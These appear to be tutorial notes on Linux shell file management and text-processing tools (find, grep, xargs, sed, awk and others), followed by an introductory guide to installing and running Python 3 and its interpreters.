$which make
/opt/app/openav/soft/bin/make
Locate the binary, source, and manual page files of the program:
$whereis command
This command comes in handy when there are multiple versions of the same software installed on the system and you are not sure which version is being used.
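As a small sketch of the lookups above, the following resolves where a command comes from. It uses command -v and type, which are shell builtins rather than the which program discussed in the text, so treat it as an alternative illustration. The command name sh is only an assumed example of something installed on the system.

```shell
# Resolve the path that the shell would run for a given command name.
# "sh" is only an example; substitute any command you want to inspect.
cmd=sh
cmd_path=$(command -v "$cmd")
echo "$cmd resolves to: $cmd_path"

# type also reports whether a name is a builtin, an alias, or a file on disk.
type cd
```

For a builtin such as cd there is no file on disk, which is why type is sometimes more informative than a pure path lookup.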
File and directory management
Contents
- File and directory management
- Create and delete
- Directory switching
- List directory entries
- Find directories and files find/locate
- View file contents
- Find the contents of a file
- Modify file and directory permissions
- Adding aliases to files
- Piping and Redirection
- Set environment variables
- Bash shortcut input or delete
- General Application
File management is nothing more than creating, deleting, querying, and moving files or directories, using mkdir/rm/mv.
File querying is the focus, using find for queries; find has many parameters and is very powerful.
Viewing file content is a big topic, and there are many tools available for text processing. They are only pointed out in this chapter; a separate chapter is devoted to text processing tools later.
Sometimes it is necessary to create an alias for a file, for which we use ln; using the alias has the same effect as using the original file.
Create and delete
- Create: mkdir
- Delete: rm
- Delete non-empty directories: rm -rf directory
- Delete log files: rm *log (to also delete them in subdirectories: $find ./ -name "*log" -exec rm {} \;)
- Move: mv
- Copy: cp (Copy directory: cp -r )
Count the files and directories under the current directory (recursively):
$find ./ | wc -l
Copy the directory:
$cp -r source_dir dest_dir
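The create, copy, move and delete commands above can be tried safely in a throwaway directory. The sketch below assumes mktemp is available (it is on typical Linux systems); the names source_dir, dest_dir, a.txt and b.txt are purely illustrative.

```shell
# Work inside a temporary directory so nothing real is touched.
workdir=$(mktemp -d)

mkdir -p "$workdir/source_dir/sub"                  # create nested directories
echo "hello" > "$workdir/source_dir/sub/a.txt"

cp -r "$workdir/source_dir" "$workdir/dest_dir"     # copy a directory tree
mv "$workdir/dest_dir/sub/a.txt" "$workdir/dest_dir/sub/b.txt"   # rename a file

# Count every entry (files and directories) below dest_dir, dest_dir included.
entry_count=$(find "$workdir/dest_dir" | wc -l)
echo "entries: $entry_count"

rm -r "$workdir/source_dir"                         # delete a non-empty directory
```

Note that find counts directories as well as files, so the total here covers dest_dir, sub and b.txt.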
Directory switching
- Change to a directory: cd
- Switch to the previous working directory: cd -
- Switch to the home directory: cd or cd ~
- Show current path: pwd
- Change the current working path to path: $cd path
List directory entries
- Display the files in the current directory ls
- Show directory entries as a list, sorted by time ls -lrt
The above command is used so often that we need to create a shortcut for it:
Set the command alias in .bashrc:
alias lsl='ls -lrt'
alias lm='ls -al|more'
so that lsl displays the files in the directory as a list, sorted by modification time.
- Add a number to the front of each file name (for a neater look):
$ls | cat -n
1 a
2 a.out
3 app
4 b
5 bin
6 config
Note: .bashrc is stored as a hidden file under the /home/your username/ folder; you can check it with ls -a.
Find directories and files find/locate
Search for a file or directory:
$find ./ -name "core*" | xargs file
Find whether there are object files in the target folder:
$find ./ -name '*.o'
Recursively delete all .o files in the current directory and subdirectories:
$find ./ -name "*.o" -exec rm {} \;
find is a real-time lookup; if you need a faster query, try locate. locate relies on an index database of the file system, so it is not a real-time lookup: when files change, you need to run updatedb periodically to refresh the index.
Find paths that contain string:
$locate string
Update the index database:
$updatedb
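A minimal sketch of the find usage described above, run against a temporary directory so that the recursive delete cannot touch real files. The file names main.c, main.o and util.o are made up for the example.

```shell
workdir=$(mktemp -d)
mkdir -p "$workdir/build/obj"
touch "$workdir/main.c" "$workdir/build/main.o" "$workdir/build/obj/util.o"

# List object files; find descends into subdirectories on its own.
found=$(find "$workdir" -name '*.o' | sort)
echo "$found"

# Delete them; {} is replaced by each matching path in turn.
find "$workdir" -name '*.o' -exec rm {} \;
remaining=$(find "$workdir" -name '*.o' | wc -l)
echo "object files left: $remaining"
```

Quoting the pattern ('*.o') matters: without quotes the shell may expand it before find ever sees it.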
View file contents
To view a file: cat vi head tail more
Display the file with line numbers:
$cat -n filename
Show list contents by page:
$ls -al | more
See only the first 10 lines:
$head -10 filename
Show the first line of the file:
$head -1 filename
Show the last 5 lines of the file:
$tail -5 filename
See the difference between the two files:
$diff file1 file2
Dynamically display the latest information in the text:
$tail -f crawler.log
Find the contents of a file
Use egrep to query the contents of a file:
egrep '03.1\/CO\/AE' TSF_STAT_111130.log.012
egrep 'A_LMCA777:C' TSF_STAT_111130.log.035 > co.out2
File and directory permission modification
- Change the owner of a file chown
- Change file read, write, execute, etc. attributes chmod
- Recursive subdirectory modification: chown -R tuxapp source/
- Add script executable permissions: chmod a+x myscript
Add aliases to files
Create symbolic/hard links:
ln cc ccAgain : hard link; if one of the two names is deleted, the content is still available through the other.
ln -s cc ccTo : symbolic link (soft link); if the source is deleted, the link no longer works (ccTo is the newly created link).
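The difference between the two kinds of link can be observed directly. This sketch reuses the names cc, ccAgain and ccTo from the text, inside a temporary directory that is assumed to live on a file system supporting hard links.

```shell
workdir=$(mktemp -d)
echo "data" > "$workdir/cc"

ln "$workdir/cc" "$workdir/ccAgain"      # hard link: a second name for the same data
ln -s "$workdir/cc" "$workdir/ccTo"      # symbolic link: a pointer to the path cc

rm "$workdir/cc"                         # remove the original name

hard_content=$(cat "$workdir/ccAgain")   # still readable through the hard link
if [ -e "$workdir/ccTo" ]; then          # -e follows the link, so this is now false
    soft_state=ok
else
    soft_state=dangling
fi
echo "hard link: $hard_content, symbolic link: $soft_state"
```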
Pipelines and Redirects
- Pipe the output of one command into the next: use |
- Run commands in sequence: use semicolon ;
- Run the next command only if the previous one succeeds: &&
- Run the next command only if the previous one fails: ||
ls /proc && echo suss! || echo failed.
This reports whether the command succeeded or failed.
Much the same effect can be written as:
if ls /proc; then echo suss; else echo failed; fi
Redirect:
ls proc/*.c > list 2>&1 redirects standard output and standard error to the same file.
The equivalent in bash is:
ls proc/*.c &> list
Clear the file:
:> a.txt
Append to a file:
echo aa >> a.txt
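The operators above can be combined in a short script. This is only a sketch: the variable names and the path called missing are invented for the example, and the error message written by ls is assumed to include the path it could not find.

```shell
workdir=$(mktemp -d)

# && runs the next command only on success, || only on failure.
ls / > /dev/null && result=success || result=failed

# Send both standard output and standard error to one file.
# "$workdir/missing" does not exist, so ls also writes an error message.
ls / "$workdir/missing" > "$workdir/list" 2>&1 || true

: > "$workdir/a.txt"            # truncate (or create) an empty file
echo aa >> "$workdir/a.txt"     # append a line
echo bb >> "$workdir/a.txt"     # append another line
line_count=$(wc -l < "$workdir/a.txt")
echo "$result, $line_count lines"
```

The order matters in > list 2>&1: standard output is pointed at the file first, and standard error is then pointed at wherever standard output currently goes.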
Setting environment variables
The file .profile is executed automatically when you log in, so you can set your own environment variables in it.
The path of installed software usually needs to be added to PATH:
PATH=$APPDIR:/opt/app/soft/bin:$PATH:/usr/local/bin:$TUXDIR/bin:$ORACLE_HOME/bin;export PATH
Bash shortcut input or delete
Shortcut keys:
Ctl-U deletes all characters from the cursor to the beginning of the line, and in some settings, the entire line
Ctl-W deletes the characters between the current cursor and the nearest preceding space
Ctl-H backspace, delete the character in front of the cursor
Ctl-R searches backward through the command history and shows the most recent match
Integrated Applications
Find the total number of records in record.log that contain AAA, but not BBB:
cat -v record.log | grep AAA | grep -v BBB | wc -l
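To see the pipeline above at work, here is a sketch with a small made-up record.log. The sample lines are assumptions chosen so that exactly two of them contain AAA without BBB.

```shell
workdir=$(mktemp -d)
printf '%s\n' 'AAA one' 'AAA BBB two' 'CCC three' 'four AAA' > "$workdir/record.log"

# Keep lines containing AAA, drop those containing BBB, then count what is left.
count=$(grep AAA "$workdir/record.log" | grep -v BBB | wc -l)
echo "$count"

# grep -c counts matching lines itself, so the final wc -l is optional.
count2=$(grep AAA "$workdir/record.log" | grep -vc BBB)
echo "$count2"
```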
Text processing
Contents
- Text processing
- find File Find
- Customized search
- Follow-up actions after finding
- Delimiters for -print
- grep text search
- xargs command line argument conversion
- sort sorting
- uniq Eliminate duplicate rows
- Convert with tr
- cut slice text by column
- paste Splice text by column
- wc Tools for counting rows and characters
- sed text replacement tool
- awk data stream processing tool
- print prints the current line
- Special variables: NR NF $0 $1 $2
- Passing external variables
- Filtering lines processed by awk with styles
- Setting delimiters
- Reading command output
- Using loops in awk
- awk combined with grep to find the specified service and kill it
- awk implements the head and tail commands
- Print specified columns
- Print a specified text area
- Common built-in functions in awk
- Iterate over lines, words and characters in a file
- Iterate over each line in the file
- Iterate over each word in a line
- Iterate over each character
This section introduces the most commonly used tools for working with text in the shell under Linux: find, grep, xargs, sort, uniq, tr, cut, paste, wc, sed, awk. The examples and arguments provided are all commonly used. My rule for shell scripts is to write a single command line and try not to exceed 2 lines; for more complex tasks, consider Python.
Find file search
find txt and pdf files:
find . \( -name "*.txt" -o -name "*.pdf" \) -print
Find .txt and .pdf files with a regular expression:
find . -regex ".*\(\.txt\|\.pdf\)$"
-iregex: like -regex, but case-insensitive
Negate a test to find all files that are not .txt:
find . ! -name "*.txt" -print
Specify the search depth, print out the files in the current directory (depth 1):
find . -maxdepth 1 -type f
Custom search
- Search by type
find . -type d -print // list all directories only
-type f files / l symbolic links / d directories
The file types supported by find can distinguish ordinary files, symbolic links, directories, and so on, but binary and text files cannot be distinguished directly by find's types.
The file command can check the specific type of file (binary or text):
$file redis-cli # binary file
redis-cli: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
$file redis.pid # Text file
redis.pid: ASCII text
So, you can use the following combination of commands to find all the binary files in your local directory:
ls -lrt | awk '{print $9}'|xargs file|grep ELF| awk '{print $1}'|tr -d ':'
- Search by time
-atime access time (in days; -amin uses minutes, and similarly below)
-mtime modification time (content was modified)
-ctime change time (metadata or permission changes)
All files that were accessed exactly 7 days ago:
find . -atime 7 -type f -print
All files that have been accessed within the last 7 days:
find . -atime -7 -type f -print
All files that were last accessed more than 7 days ago:
find . -atime +7 -type f -print
- Search by size
Size units: w (two-byte words), k, M, G. Find files larger than 2k:
find . -type f -size +2k
Find by permissions:
find . -type f -perm 644 -print //find all files whose permissions are exactly 644
Find by user:
find . -type f -user weber -print// Find files owned by user weber
Follow-up actions after finding
- Delete
Delete all swp files in the current directory:
find . -type f -name "*.swp" -delete
Another syntax:
find . -type f -name "*.swp" | xargs rm
- Execute action (powerful exec)
Change the owner of all root-owned files under the current directory to weber:
find . -type f -user root -exec chown weber {} \;
Note: {} is a special string, and for each matching file, {} is replaced with the corresponding filename.
Copy all the files found to another directory:
find . -type f -mtime +10 -name "*.txt" -exec cp {} OLD \;
- Combining multiple commands
If you need to execute multiple commands subsequently, you can write multiple commands as one script. Then just execute the script when -exec is called:
-exec ./commands.sh {} \;
-print's delimiter
-print uses '\n' as the delimiter between file names by default.
-print0 uses '\0' as the delimiter instead, so that file names containing spaces are handled correctly.
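The following sketch shows why the NUL delimiter matters, pairing -print0 with xargs -0. The file name "my notes.txt" is an invented example that contains a space.

```shell
workdir=$(mktemp -d)
printf 'a\nb\n' > "$workdir/my notes.txt"     # file name contains a space
printf 'c\n'    > "$workdir/plain.txt"

# NUL-separated names survive the space, so cat receives each path intact.
total=$(find "$workdir" -type f -name '*.txt' -print0 | xargs -0 cat | wc -l)
echo "total lines: $total"
```

With plain -print and xargs, the name "my notes.txt" would be split into two arguments and the command would fail on both halves.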
Grep text search
grep match_pattern file // prints matching lines by default
Common parameters
-o output only the matching part of each line VS -v output only the lines that do not match
-c count the number of lines that contain the text
grep -c "text" filename
-n Print matching line numbers
-i Ignore case when searching
-l prints only the file name
Recursive search for text in multi-level directories (a favorite of programmers searching for code):
grep "class" . -R -n
Match multiple patterns:
grep -e "class" -e "virtual" file
Make grep terminate each output file name with a NUL (0) byte (-Z):
grep "test" file* -lZ| xargs -0 rm
Comprehensive application: find all sql lookups with where conditions in the log:
cat LOG.* | tr a-z A-Z | grep "FROM " | grep "WHERE" > b
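The common grep options listed above can be compared side by side. This is a sketch over a three-line sample file; the file name code.txt and its contents are assumptions made for the example.

```shell
workdir=$(mktemp -d)
printf '%s\n' 'class Foo' 'virtual void run();' 'Class bar' > "$workdir/code.txt"

matches=$(grep -c 'class' "$workdir/code.txt")                   # matching lines, case-sensitive
matches_i=$(grep -ci 'class' "$workdir/code.txt")                # same, ignoring case
numbered=$(grep -n -e 'class' -e 'virtual' "$workdir/code.txt")  # either pattern, with line numbers
only=$(grep -o 'F[a-z]*' "$workdir/code.txt")                    # just the matched text
echo "$matches $matches_i $only"
echo "$numbered"
```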
Example of searching for Chinese text: a project directory contains files in both UTF-8 and GB2312 encodings, and we want to find the word 中文 ("Chinese").
- Look up its encodings: the UTF-8 and GB2312 encodings are E4B8ADE69687 and D6D0CEC4 respectively
- Query:
grep -rnP "\xE4\xB8\xAD\xE6\x96\x87|\xD6\xD0\xCE\xC4" *
Chinese character code lookup: http://bm.kdd.cc/
Xargs Command Line Parameter Conversion
xargs converts input data into command line arguments for a specific command; in this way, it can be combined with many commands, such as grep and find.
- Convert multi-line input to single-line output
cat file.txt| xargs
\n is the delimiter between multiple lines of text
- Convert single-line input to multi-line output
cat single.txt | xargs -n 3
-n: specifies the number of fields to display per line
Description of xargs parameters
-d defines the delimiter (by default, input is split on blanks and newlines)
-n specifies the maximum number of arguments per command line, so the output spans multiple lines
-I {} specifies the replacement string that is substituted with each input item when xargs runs the command; used when the argument must appear at a specific position in the command
-0: use the NUL character as the input delimiter
Example:
cat file.txt | xargs -I {} ./command.sh -p {} -1
# Count the number of lines in the program
find source_dir/ -type f -name "*.cpp" -print0 |xargs -0 wc -l
# redis stores data by string and indexes by set, and needs to look up all values by index.
./redis-cli smembers $1 | awk '{print $1}'|xargs -I {} ./redis-cli get {}
Sort
Field Description
-n sort numerically VS -d sort in dictionary order
-r sort in reverse order
-k N sort by column N
Example:
sort -nrk 1 data.txt
sort -bd data // ignore leading whitespace characters like spaces
Uniq Eliminate duplicate rows
- Eliminate duplicate rows
sort unsort.txt | uniq
- Count the number of times each row appears in the file
sort unsort.txt | uniq -c
- Find duplicate rows
sort unsort.txt | uniq -d
You can restrict which part of each line is compared: -s N skips the first N characters, -w N compares at most N characters
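sort and uniq are usually used together, as in this sketch of a frequency count. The sample words in unsort.txt are invented for the example.

```shell
workdir=$(mktemp -d)
printf '%s\n' pear apple pear fig apple pear > "$workdir/unsort.txt"

# uniq only collapses adjacent duplicates, so sort first.
# The second sort orders the counts numerically, highest first.
counts=$(sort "$workdir/unsort.txt" | uniq -c | sort -nr)
echo "$counts"

top=$(echo "$counts" | head -n 1 | awk '{print $2}')         # most frequent line
dups=$(sort "$workdir/unsort.txt" | uniq -d | tr '\n' ' ')   # lines seen more than once
echo "top: $top, duplicated: $dups"
```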
Converting with tr
- General usage
echo 12345 | tr '0-9' '9876543210' // encryption and decryption conversion, replacing the corresponding characters
cat text| tr '\t' ' ' //tab to space conversion
- tr delete characters
cat file | tr -d '0-9' // delete all numbers
-c use the complement of the set
cat file | tr -c '0-9\n' ' ' // replace every character that is not a digit or newline with a space
cat file | tr -d -c '0-9 \n' // delete everything except digits, spaces and newlines
- tr compress characters
tr -s compresses repetitive characters in text; most often used to compress extra spaces:
cat file | tr -s ' '
- Character classes
Various character classes are available in tr:
alnum: letters and numbers
alpha: letters
digit: numbers
space: blank characters
lower: lowercase
upper: uppercase
cntrl: control (non-printable) characters
print: printable characters
Usage: tr '[:class:]' '[:class:]'
tr '[:lower:]' '[:upper:]'
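A few of the tr forms described above, collected in one runnable sketch. The input strings are arbitrary examples.

```shell
upper=$(echo 'hello world' | tr '[:lower:]' '[:upper:]')    # change case
digits=$(echo 'tel: 555-0100' | tr -d -c '0-9\n')           # keep only digits and the newline
squeezed=$(echo 'a    b   c' | tr -s ' ')                   # collapse repeated spaces
swapped=$(echo 12345 | tr '0-9' '9876543210')               # map each digit d to 9-d
echo "$upper | $digits | $squeezed | $swapped"
```

Applying the digit mapping a second time restores the original text, which is why the text calls it an encryption and decryption conversion.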
Cut Slice text by column
- Extract the second and fourth columns of the file
cut -f2,4 filename
- Print all columns of the file except column 3
cut -f3 --complement filename
-d Specify the delimiter
cut -f2 -d";" filename
- The range to take
N-: from the Nth field to the end
-M: from the 1st field to the Mth field
N-M: fields N through M
- The unit to be fetched by cut
-b in bytes
-c in characters
-f in fields (using delimiters)
Example:
cut -c1-5 file // print the first 5 characters
cut -c-2 file // print the first 2 characters
Extract characters 5 to 7 of the text
$echo string | cut -c5-7
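The field and character ranges can be checked against a single sample record. The semicolon-separated row below is made up for illustration.

```shell
row='alice;30;paris;engineer'

second=$(echo "$row" | cut -d';' -f2)          # one field
pair=$(echo "$row" | cut -d';' -f2,4)          # fields 2 and 4
tail_fields=$(echo "$row" | cut -d';' -f3-)    # field 3 to the end
chars=$(echo 'abcdefgh' | cut -c5-7)           # characters 5 through 7
echo "$second | $pair | $tail_fields | $chars"
```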
Paste Splice text by column
Splices two pieces of text together by column;
cat file1
1
2
cat file2
colin
book
paste file1 file2
1 colin
2 book
The default delimiter is a tab; you can use -d to specify a different delimiter:
paste file1 file2 -d ","
1,colin
2,book
Wc Tools for counting lines and characters
$wc -l file // count the number of lines
$wc -w file // count the number of words
$wc -c file // count the number of bytes (use -m to count characters)
Sed text replacement tool
- First substitution
sed 's/text/replace_text/' file // Replace the first matching text on each line
- Global replacement
sed 's/text/replace_text/g' file
By default, sed prints the result to standard output; to modify the original file in place, use -i:
sed -i 's/text/replace_text/g' file
- Remove blank lines
sed '/^$/d' file
- Referencing the matched text
The matched string is referenced with the & marker.
echo this is en example | sed 's/\w\+/[&]/g'
$>[this] [is] [en] [example]
- Substring matching tokens
The contents of the first matching bracket pair are referenced using \1
sed 's/hello\([0-9]\)/\1/'
- Double quotes for values
sed expressions are usually wrapped in single quotes; double quotes can also be used, in which case the shell expands variables inside the expression:
sed "s/$var/HLLOE/"
With double quotes, we can use shell variables in both the pattern and the replacement string.
eg:
p=patten
r=replaced
echo "line con a patten" | sed "s/$p/$r/g"
$>line con a replaced
- Other examples
Insert a character into a string: convert each line of text (ABCDEF) to ABC/DEF:
sed 's/^.\{3\}/&\//g' file
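The sed substitutions above can be verified on short strings. In this sketch the word pattern is spelled with POSIX character classes instead of \w\+, on the assumption that this keeps it portable beyond GNU sed; the variable names and input strings are illustrative.

```shell
# & stands for the whole match; the bracket expression matches one "word".
bracketed=$(echo 'this is an example' | sed 's/[[:alnum:]_][[:alnum:]_]*/[&]/g')

# \1 refers to the text captured by the first \( ... \) group.
digit=$(echo 'hello7 world' | sed 's/hello\([0-9]\)/\1/')

# Double quotes let the shell expand variables before sed runs.
p=pattern
r=replaced
expanded=$(echo 'line with a pattern' | sed "s/$p/$r/g")

# Insert a slash after the first three characters of the line.
split=$(echo 'ABCDEF' | sed 's/^.\{3\}/&\//')
echo "$bracketed | $digit | $expanded | $split"
```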
Awk data stream processing tool
- The awk script structure
awk ' BEGIN{ statements } statements2 END{ statements } '
- How it works
- Execute the block of statements in BEGIN.
- Read a line from the file or stdin and execute statements2, repeating the process until the input has been read in its entirety.
- Execute the END statement block.
print prints the current line
- When using print without arguments, the current line is printed
echo -e "line1\nline2" | awk 'BEGIN{print "start"} {print } END{ print "End" }'
- When the arguments of print are separated by commas, the output values are separated by spaces;
echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1, var2 , var3; }'
$>v1 V2 v3
- Concatenating with an explicit joiner (here "-" is the joining string);
echo | awk ' {var1 = "v1" ; var2 = "V2"; var3 = "v3"; \
print var1"-"var2"-"var3; }'
$>v1-V2-v3
Special variables: NR NF $0 $1 $2
NR: the number of records read so far; during execution it corresponds to the current line number.
NF: the number of fields; during execution it corresponds to the number of fields in the current line.
$0:this variable contains the text content of the current line during execution.
$1:the text content of the first field.
$2:the text content of the second field.
echo -e "line1 f2 f3 \n line2 \n line 3" | awk '{print NR":"$0"-"$1"-"$2}'
- Print the second and third fields of each line
awk '{print $2, $3}' file
- Count the number of lines in the file
awk ' END {print NR}' file
- Accumulate the first field of each line
echo -e "1\n 2\n 3\n 4\n" | awk 'BEGIN{sum = 0 ;
print "begin";} {sum += $1;} END {print "=="; print sum }'
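The special variables are easiest to understand on a tiny data set. The three sample lines below are invented, with the second line deliberately carrying an extra field.

```shell
data=$(printf '%s\n' 'alice 10' 'bob 20 extra' 'carol 12')

# NR is the current line number, NF the number of fields on that line.
report=$(echo "$data" | awk '{print NR ":" NF ":" $1}')
echo "$report"

# Accumulate the second field on every line, then print the total once in END.
sum=$(echo "$data" | awk '{sum += $2} END {print sum}')
echo "sum: $sum"
```

Uninitialized awk variables start out as zero in a numeric context, so the BEGIN block is optional for a plain sum.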
Passing external variables
var=1000
echo | awk '{print vara}' vara=$var # Input from stdin
awk '{print vara}' vara=$var file # Input from file
Filter the lines processed by awk with patterns
awk 'NR < 5' # line number less than 5
awk 'NR == 1,NR == 4 {print}' file # print lines 1 through 4
awk '/linux/' # lines containing linux text (can be specified with regular expressions, super powerful)
awk '! /linux/' # lines that do not contain linux text
Set delimiters
Use -F to set delimiters (default is whitespace):
awk -F: '{print $NF}' /etc/passwd
Read command output
Use getline to read the output of an external shell command into the variable cmdout:
echo | awk '{"grep root /etc/passwd" | getline cmdout; print cmdout }'
Using loops in awk
for(i=0;i<10;i++){print $i;}
for(i in array){print array[i];}
eg: Given the following string, print out the time string:
2015_04_02 20:20:08: mysqli connect failed, please check connect info
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F ":" '{ for(i=1;i<=3;i++) printf("%s:",$i)}'
>2015_04_02 20:20:08: # This way prints a trailing colon
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; }'
>2015_04_02 20:20:08 # This way satisfies the requirement
And if you need to print out the later part as well (the time part is printed separately from the later text) :
$echo '2015_04_02 20:20:08: mysqli connect failed, please check connect info'|awk -F':' '{print $1 ":" $2 ":" $3; print $4;}'
>2015_04_02 20:20:08
>mysqli connect failed, please check connect info
Print the rows in reverse order (implementation of the tac command):
seq 9| \
awk '{lifo[NR] = $0; lno=NR} \
END{ for(;lno>0;lno--){print lifo[lno];}
} '
awk combined with grep finds the specified service and kills it
ps -fe| grep msv8 | grep -v MFORWARD | awk '{print $2}' | xargs kill -9;
awk implementation of head and tail commands
- head
awk 'NR<=10{print}' filename
- tail
awk '{buffer[NR%10] = $0;} END{for(i=NR-9;i<=NR;i++){ \
if(i>0) print buffer[i%10]} } ' filename
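The tail idea above is a ring buffer: only the last n lines are kept, and they are replayed in order at the end. The sketch below generalizes the line count into a variable n (an assumption for illustration, passed with -v) and uses seq to produce test input.

```shell
# Keep only the last n lines in a ring buffer indexed by NR % n,
# then replay the buffer in input order once the input ends.
last3=$(seq 10 | awk -v n=3 '
    { buffer[NR % n] = $0 }
    END {
        start = (NR > n) ? NR - n + 1 : 1
        for (i = start; i <= NR; i++) print buffer[i % n]
    }' | tr '\n' ' ')
echo "$last3"
```

Starting the replay at line NR - n + 1 is what keeps the output in the original order, and the start = 1 case covers inputs shorter than n lines.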
Print the specified column
- awk way to implement
ls -lrt | awk '{print $6}'
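- The cut method (cut splits on tabs by default, so squeeze the spaces and split on a single space)
ls -lrt | tr -s ' ' | cut -d' ' -f6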
Print the specified text area
- Determine the line number
seq 100| awk 'NR==4,NR==6{print}'
- Determine the text
Print the text between start_pattern and end_pattern:
awk '/start_pattern/, /end_pattern/' filename
Example:
seq 100 | awk '/13/,/15/'
cat /etc/passwd| awk '/mai.*mail/,/news.*news/'
awk common built-in functions
index(string,search_string): return the position of search_string in string
sub(regex,replacement_str,string): replace the first match of regex in string with replacement_str
match(string,regex): check whether the regular expression matches the string
length(string): return the length of the string
echo | awk '{"grep root /etc/passwd" | getline cmdout; print length(cmdout) }'
printf is similar to printf in C and formats the output:
seq 10 | awk '{printf "->%4s\n", $1}'
Iterate over lines, words and characters in a file
Iterate over each line in the file
- while loop method
while read line;
do
echo $line;
done < file.txt
The same loop, run in a subshell:
cat file.txt | (while read line;do echo $line;done)
- awk method
cat file.txt| awk '{print}'
Iterate over each word in a line
for word in $line;
do
echo $word;
done
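The line loop and the word loop can be nested. This sketch counts lines and words in a two-line sample file; the file name and contents are assumptions, and IFS= with read -r is a common hardening of the plain read shown above rather than something the text requires.

```shell
workdir=$(mktemp -d)
printf '%s\n' 'one two' 'three' > "$workdir/file.txt"

line_total=0
word_total=0
# IFS= and -r keep leading spaces and backslashes in each line intact.
while IFS= read -r line; do
    line_total=$((line_total + 1))
    # Unquoted $line is split on whitespace, giving one word per iteration.
    for word in $line; do
        word_total=$((word_total + 1))
    done
done < "$workdir/file.txt"
echo "lines: $line_total, words: $word_total"
```

Because the loop reads from a redirect and not from a pipe, it runs in the current shell, so the counters are still set after the loop ends.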
Iterate over each character
${string:start_pos:num_of_chars}: extract a substring from the string (bash text slicing)
${#word}: return the length of the variable word
for((i=0;i<${#word};i++))
do
echo ${word:i:1};
done
Display the file in ASCII characters:
$od -c filename
Python Programming Quick Guide - Installation and Basic IO
https://www.liaoxuefeng.com/wiki/1016959663602400
https://www.w3schools.com/python/python_intro.asp
https://docs.python.org/3/
What is Python?
Python is a popular programming language. It was created by Guido van Rossum, and released in 1991.
It is used for:
- web development (server-side),
- software development,
- mathematics,
- system scripting.
What can Python do?
- Python can be used on a server to create web applications.
- Python can be used alongside software to create workflows.
- Python can connect to database systems. It can also read and modify files.
- Python can be used to handle big data and perform complex mathematics.
- Python can be used for rapid prototyping, or for production-ready software development.
Why Python?
- Python works on different platforms (Windows, Mac, Linux, Raspberry Pi, etc).
- Python has a simple syntax similar to the English language.
- Python has a syntax that allows developers to write programs with fewer lines than some other programming languages.
- Python runs on an interpreter system, meaning that code can be executed as soon as it is written. This means that prototyping can be very quick.
- Python can be treated in a procedural way, an object-oriented way, or a functional way.
Good to know
- The most recent major version of Python is Python 3, which we shall be using in this tutorial. Python 2 reached end of life in January 2020 and no longer receives updates, although legacy Python 2 code is still in use.
- In this tutorial, Python will be written in a text editor. It is possible to write Python in an Integrated Development Environment, such as Thonny, Pycharm, Netbeans, or Eclipse which are particularly useful when managing larger collections of Python files.
Python Syntax compared to other programming languages
- Python was designed for readability, and has some similarities to the English language with influence from mathematics.
- Python uses new lines to complete a command, as opposed to other programming languages which often use semicolons or parentheses.
- Python relies on indentation, using whitespace, to define scope; such as the scope of loops, functions, and classes. Other programming languages often use curly brackets for this purpose.
Example
print("Hello, World!")
Installing Python
Because Python is cross-platform, it can run on Windows, Mac, and various Linux/Unix systems. Python programs written on Windows are capable of running when put on Linux.
To start learning Python programming, you first have to install Python into your computer. Once installed, you'll get the Python interpreter (which is responsible for running Python programs), a command line interactive environment, and a simple integrated development environment.
Installing Python 3.8
Currently, there are two versions of Python, version 2.x and version 3.x, which are incompatible. Since version 3.x is becoming more and more popular, our tutorial will be based on the latest Python version 3.8. Please make sure that the version of Python installed on your computer is the latest 3.8.x so that you can learn this tutorial painlessly.
Installing Python on a Mac
If you are using a Mac with OS X>=10.9, the version of Python that comes with the system is 2.7. To install the latest Python 3.8, there are two methods.
Method 1: Download the installer for Python 3.8 from the official Python website, double-click it after downloading and run it and install it.
Method 2: If Homebrew is installed, just install it directly via the command brew install python3.
Installing Python on Linux
If you are using Linux, then I can assume that you have Linux system administration experience and should have no problem installing Python 3 on your own, otherwise, switch back to Windows.
For a large number of students who are currently still using Windows, if you have no plans to switch to a Mac soon, you can continue reading below.
Installing Python on Windows
First, depending on your version of Windows (64-bit or 32-bit), download the 64-bit installer or 32-bit installer, then, run the downloaded exe installer:
Pay special attention to checking Add Python 3.8 to PATH, and then click Install Now to complete the installation.
Run Python
After successful installation, open a command prompt window and type python. One of two cases will appear.
Case 1:
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│Python 3.8.x ... │
│[MSC v... 64 bit (AMD64)] on win32 │
│Type "help", "copyright", "credits" or "license" for mor│
│information. │
│>>> _ │
│ │
│ │
└────────────────────────────────────────────────────────┘
Seeing the above screen means that Python was installed successfully!
The fact that you see the prompt >>> means that we are in the Python interactive environment and can type any Python code; the result of each statement is shown immediately after you enter it. Now, type exit() and press Enter to exit the Python interactive environment (you can also close the command line window directly).
Case 2: You get an error.
┌────────────────────────────────────────────────────────┐
│Command Prompt - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0] │
│(c) 2015 Microsoft Corporation. All rights reserved. │
│ │
│C:\> python │
│'python' is not recognized as an internal or external co│
│mmand, operable program or batch file. │
│ │
│C:\> _ │
│ │
│ │
│ │
└────────────────────────────────────────────────────────┘
This is because Windows looks for python.exe in the directories listed in the Path environment variable, and if it doesn't find it, it reports an error. If you missed checking Add Python 3.8 to PATH during installation, you will have to manually add the directory where python.exe is located to Path.
If you don't know how to change the environment variables, we recommend running the Python installer again, making sure to check Add Python 3.8 to PATH.
Python interpreter
When we write Python code, we get a text file with a .py extension that contains Python code. To run the code, a Python interpreter is needed to execute the .py file.
Since the entire Python language is open source, from the specification to the interpreter, theoretically anyone with a high enough level of proficiency could write a Python interpreter to execute Python code (with great difficulty, of course). In fact, multiple Python interpreters do exist.
CPython
When we download and install Python 3.x from the official Python website, we get an official version of the interpreter directly: CPython. This interpreter is developed in C, hence the name CPython. Running python at the command line starts the CPython interpreter.
CPython is the most widely used Python interpreter. All the code in the tutorial is also executed under CPython.
IPython
IPython is an interactive interpreter based on CPython. That is, IPython only enhances the way you interact with it; the functionality of executing Python code is exactly the same as in CPython. It's like the many domestic browsers that look different on the outside but actually call the IE kernel underneath.
